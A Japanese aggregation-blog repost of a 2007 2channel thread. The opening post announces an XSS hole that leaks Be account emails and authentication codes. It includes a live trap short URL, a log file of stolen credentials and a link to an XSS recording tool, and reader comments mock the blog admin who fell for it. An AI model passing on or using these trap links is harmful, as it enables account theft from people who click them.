( ;^ω^)<へいわぼけ | |
TOP アーカイブ お国と政治 痛い 社会・生活 調査・雑学 ゲーム・ホビー 漫画・アニメ IT 朝鮮半島 2ちゃんねる ネタ このブログについて |
1:スレ立て代行@大学中退(兵庫県) 2007/11/27(火) 23:22:25 ID:EbtVATOs0●
俺こと脱帽は、先日のいつか忘れたけど2chにXSSの脆弱性を発見した。
今回は通常のウェブブラウザ(除く専ブラ)からBeにログインした状態で任意のURLにアクセスするとBeのメアドと認証コードが漏れる脆弱性であり、それによってアカウント乗っ取りやプロフィールの変更が可能になってしまう。
このスレッドのアドレスは色々と危険です。踏むときは自己責任で
現時点で数箇所のCGIで同脆弱性を確認しているが、この限りではない可能性もある。サンプルURLを貼って置くが絶対に悪用しないよう注意を促したい。
http://z.la/ms0k2 (短縮URL、罠なので踏む時は注意)
http://moyashi.sosite.jp/xss/log.txt (盗まれた情報が記録されるファイル)
▼ 汎用XSS記録装置
http://moyashi.sosite.jp/xss/
▼ 俺公式サイト
http://manabi.homeunix.net/
米1だったら就職探す
管理人も引っかかったのかw
管理人残念w
よくわからんがやばそうなのはわかった
踏んでもアカウント登録してなきゃ大丈夫だろw
とりあえず十行で俺に教えてくれ
Be焼かれた\(^o^)/
管理人バロスw
管理人どんまいw
管理人は静岡かw
Beって何かいまだによくわかってない人間だけど
危険なURLならh抜いといたほうがいいんじゃないの?
ポインヨスレうざかったから丁度いいよ
見慣れない隠語が多すぎてさっぱりだぜ
管理人ワロタw
Beが何かすらわからん
Be + FasterFox
恐ろしい組み合わせだ
h外しておいた方がいいと思われ
くやしいのうwwwくやしいのうwww
管理人ワロタwwww
wwwwwwww
w管w理w人w
wwwwwwww
よくわからんけど
ぶっちゃけ大したこと無いんだろ?
米20
そうだよ。だから早くアドレスを踏むんだ!
管理人カワイソスww
米1
絶対ハローワーク行けよ
途中で帰ってくるなよ
管理人カワイソスw
管理人が不憫過ぎて言葉が出ない
米16
それはヤバすぎるwwww
先読み機能とかってやばいな。
Operaとかだいじょうぶなのかな。
管理人の自虐ネタに吹いたwwwwww
つか危険なアドレスっていうんなら
リンクにしないほうがいいと思うんだけど。
間違えて踏んだらどうすんのよ
2chスレ内なら勢いで踏んだりあるだろうけど
ここでこれだけ危険だっつってんのに踏むやつもいないだろww
※29
踏むつもりはなくても、窓開け閉めしてる時とかに間違って押しちゃう可能性とかあるだろ。
確かに直鈴は危険だな。
誰か解説頼む
よくわからんがBeとかいうやつのアカウントハックってことか?
be持ってない俺は勝ち組
Beとかモリタポとか焼かれたとか、わけわかりませんので
どうやばいことなのか手短に教えてください。
※28
糞管理人が腹いせに他人も巻き込みたいだけ
beもちでもなんでもないから全く分からんww
VIPでコテのbeポインヨが使われたのと関係アリ?
どれだけやばいのかポケモンにたとえて説明してくれ
Beよくわからんからつかってなかった俺が踏んでもまずいの?
管理人ワロタwww
よくわからんが管理人がh抜いてくれたおかげで助かった。。。のか?
うわああああああ間違えて踏んじまったあああああ
あ、俺BE持ってなかった
,,--'''""`ヽ' -/"~  ̄`ヽ、
/ ヾ''" ~`ヽ
/ _,,,... ヽ;: /""ヽ ヽ
/ ;'" "\ l /;:;;:::-'''ヽ, i
/ /,,--:-'''''"~:::::::::::::::::::::::::::ヽ, .|
/ /;:;;:::'''::::::::::::::::::::::::::::::::::::::::ヽ ヽ
| |::::::::::::::::::::::::::::::::::::::::::::::::::::::::ヽ |
/ ;/ :::::::::::、::::::::::::::::::::::::::::::;/ ヽ i,
/ ;:;:ヽ ::::::::\::::::::::::::::::::::::/ ヽ i,
i / )( ::::\;;::::::::::::;/ ,,-'''ヽヽ ヽ
| | ⌒ ,;''"'''-;,_ \l,::,l/ !" ●) | | おどれら俺の掲示板で何してんじゃ!!!
| |. ( ● >>><< `"'''''' | |
| ;:| "''''''''""^ \ | |
| ヽ. ゝ( ,-、 ,:‐、) | |
| /ヾ.. / ,--'""ヽ;; | |
| | .//二二ノ""^ソ ;| |
.. | `、ヽ ヘ`\┼┼┼ ,!ヽ | |
| ヽ\ \"ヽ-;:,,,,,,ノ / / |
| l `ー、_ \,,,,,__,,,ノ /ヽ./
ヽ. :人 ヽ-、 ∴∵ / |ヽl
/;:;:;:;;:;:;: _/ `ー-、 "'====---''",.-'" \ー---
,.-'" \: \ .,.-''" |
/. \ ~>、,.-''" |
危ないっつってんだから、俺は一切踏まない
つかなんのことかさっぱりだが、これは情報弱者というべきか?
Beってなんなのか分からない。
みんなすごいな。
かwwwかんrwwww管wwwかwwww管理人さぁんwwwwwwwwwwwww
管理人wwwwwwwなにやってんのwwwwwwwwww
管理人は2chねらーの鑑だなwwwww
ねらーとしてよくやったwwww
今回は乙
知識面で、このスレと絶望的な差を感じるぜ( ゚Д゚)
>>1に要するにアクセスすると
http://ja.wikipedia.org/wiki/Be_%282%E3%81%A1%E3%82%83%E3%82%93%E3%81%AD%E3%82%8B%E3%82%AB%E3%83%86%E3%82%B4%E3%83%AA%29
のIDが引き抜かれるの?
Beとか良く分からんが取り合えず不正アクセスになりそうでリンク踏めないw
管理人さすがだぜ…
BEって何だkwsk
※1
応援してるぞ。
半角数字を、米・※・#・*・*のあとに入れることによりコメントに、
>>のあとに入れることにより本文にレスをすることができます。